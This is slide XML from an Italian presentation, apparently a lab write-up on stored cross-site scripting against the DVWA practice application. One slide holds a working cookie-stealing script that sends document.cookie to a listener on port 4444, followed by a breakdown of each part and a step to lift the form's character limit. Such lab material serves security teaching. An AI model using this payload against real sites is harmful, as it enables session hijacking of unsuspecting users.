            <p:spPr>
              <a:xfrm flipH="false" flipV="false" rot="0">
                <a:off x="0" y="0"/>
                <a:ext cx="2291554" cy="131587"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect r="r" b="b" t="t" l="l"/>
                <a:pathLst>
                  <a:path h="131587" w="2291554">
                    <a:moveTo>
                      <a:pt x="13836" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2277718" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2285360" y="0"/>
                      <a:pt x="2291554" y="6195"/>
                      <a:pt x="2291554" y="13836"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2291554" y="117751"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2291554" y="121420"/>
                      <a:pt x="2290097" y="124940"/>
                      <a:pt x="2287502" y="127534"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2284907" y="130129"/>
                      <a:pt x="2281388" y="131587"/>
                      <a:pt x="2277718" y="131587"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13836" y="131587"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="6195" y="131587"/>
                      <a:pt x="0" y="125392"/>
                      <a:pt x="0" y="117751"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="13836"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="10167"/>
                      <a:pt x="1458" y="6647"/>
                      <a:pt x="4053" y="4053"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6647" y="1458"/>
                      <a:pt x="10167" y="0"/>
                      <a:pt x="13836" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </p:spPr>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr name="TextBox 15" id="15"/>
              <p:cNvSpPr txBox="true"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="-47625"/>
                <a:ext cx="2291554" cy="179212"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr anchor="ctr" rtlCol="false" tIns="97837" lIns="97837" bIns="97837" rIns="97837"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr">
                  <a:lnSpc>
                    <a:spcPts val="3079"/>
                  </a:lnSpc>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 16" id="16"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="225420"/>
              <a:ext cx="19468549" cy="483962"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
                <a:lnSpc>
                  <a:spcPts val="3210"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2140">
                  <a:solidFill>
                    <a:srgbClr val="555555"/>
                  </a:solidFill>
                  <a:latin typeface="Open Sauce Bold"/>
                </a:rPr>
                <a:t>&lt;script&gt;window.location='http://127.0.0.1:4444/?cookie='+document.cookie&lt;/script&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 17" id="17"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="5603172" y="2563848"/>
            <a:ext cx="6881168" cy="9535438"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 18" id="1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9" id="1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20" id="2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21" id="2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2" id="2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3" id="2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24" id="2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25" id="2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6" id="2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7" id="2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8" id="2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29" id="29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="4982132">
            <a:off x="2067939" y="3999788"/>
            <a:ext cx="4416197" cy="2230179"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2230179" w="4416197">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4416196" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4416196" y="2230179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2230179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 30" id="30"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="5444897" y="4453801"/>
            <a:ext cx="7436307" cy="5422286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3218"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2299">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Qui di sopra è possibile osservare lo script malevolo in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2299">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2299">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> che ci consegnerà i cookie di sessione dello sfortunato utente sul nostro server in ascolto. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2798"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2798"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1999">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Analizziamo lo script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="431621" indent="-215810" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2798"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1999">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>window.location=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1999">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: è una proprietà del browser che viene usata per ottenere o impostare l'URL corrente della finestra. In questo caso, viene utilizzata per reindirizzare l'utente all’URL del nostro local host e alla porta 4444.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="431621" indent="-215810" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2798"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1999">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>cookie=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1999">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: è il parametro di query “ ?cookie=’ “che includerà i cookie di sessione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="431621" indent="-215810" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2798"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1999">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>+document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1999">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Questa parte concatena il valore di document.cookie alla stringa URL. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1999">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>document.cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1999">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>è un comando javascript che </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1999">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>recupera tutti i coockie disponibili della pagina corrente.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 31" id="31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="true" rot="6270164">
            <a:off x="12083236" y="3545390"/>
            <a:ext cx="4416197" cy="2230179"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2230179" w="4416197">
                <a:moveTo>
                  <a:pt x="0" y="2230179"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4416197" y="2230179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4416197" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2230179"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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6722352" y="-2298869"/>
            <a:ext cx="4881397" cy="4673937"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4673937" w="4881397">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4881396" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4881396" y="4673938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4673938"/>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712593" y="4174665"/>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1842915" y="4501426"/>
            <a:ext cx="7428197" cy="7576077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7576077" w="7428197">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7428196" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7428196" y="7576077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7576077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="-9963" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1672016"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3.5 - SCRIPT</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10" id="10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="-882939" y="572906"/>
            <a:ext cx="6881168" cy="9535438"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 11" id="11"/>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2" id="12"/>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3" id="13"/>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4" id="14"/>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5" id="15"/>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6" id="16"/>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7" id="17"/>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8" id="18"/>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9" id="19"/>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1" id="21"/>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22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8204082" y="7994926"/>
            <a:ext cx="9500583" cy="786283"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="786283" w="9500583">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9500583" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9500583" y="786283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="786283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="-255081" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8762669" y="1900041"/>
            <a:ext cx="8383408" cy="4776593"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4776593" w="8383408">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8383408" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8383408" y="4776593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4776593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 24" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="7088878" y="3736084"/>
            <a:ext cx="1954879" cy="552253"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="552253" w="1954879">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1954878" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1954878" y="552253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="552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4773716">
            <a:off x="12100642" y="6987274"/>
            <a:ext cx="1629305" cy="460279"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="460279" w="1629305">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1629305" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629305" y="460279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="460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4657547" y="5896315"/>
            <a:ext cx="1056203" cy="603356"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="603356" w="1056203">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1056203" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1056203" y="603356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6033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8" id="28"/>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9" id="29"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="395802" y="2624909"/>
            <a:ext cx="6378092" cy="7442127"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3503"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2502">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>L’ultimo passaggio prima di immettere lo script è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2502">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>modificare la lunghezza massima di caratteri consentita nella pagina della DVWA.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2502">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3503"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2502">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Ispezionando il codice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2502">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2502">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e la sezione textarea, siamo in grado di modificare il limite, portandolo a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2502">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>100 caratteri.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2502">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3503"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2502">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Così facendo, sarà possibile utilizzare il nostro script.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3503"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3503"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3503"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3503"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3503"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3503"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3503"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3503"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2502">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 30" id="30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="15630696" y="8032066"/>
            <a:ext cx="1371905" cy="783701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="783701" w="1371905">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1371905" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1371905" y="783701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7837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cover dir="u"/>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1842915" y="-3474845"/>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3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="8100000">
            <a:off x="1506345" y="-1796167"/>
            <a:ext cx="4881397" cy="4673937"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4673937" w="4881397">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4881397" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4881397" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11416309" y="3420467"/>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8100000">
            <a:off x="-1895348" y="7584589"/>
            <a:ext cx="4881397" cy="4673937"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4673937" w="4881397">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4881396" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4881396" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-2402598" y="1682223"/>
            <a:ext cx="8168277" cy="7576077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7576077" w="8168277">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8168277" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8168277" y="7576077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7576077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 7" id="7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11842915" y="4501426"/>
            <a:ext cx="7428197" cy="7576077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7576077" w="7428197">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7428196" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7428196" y="7576077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7576077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
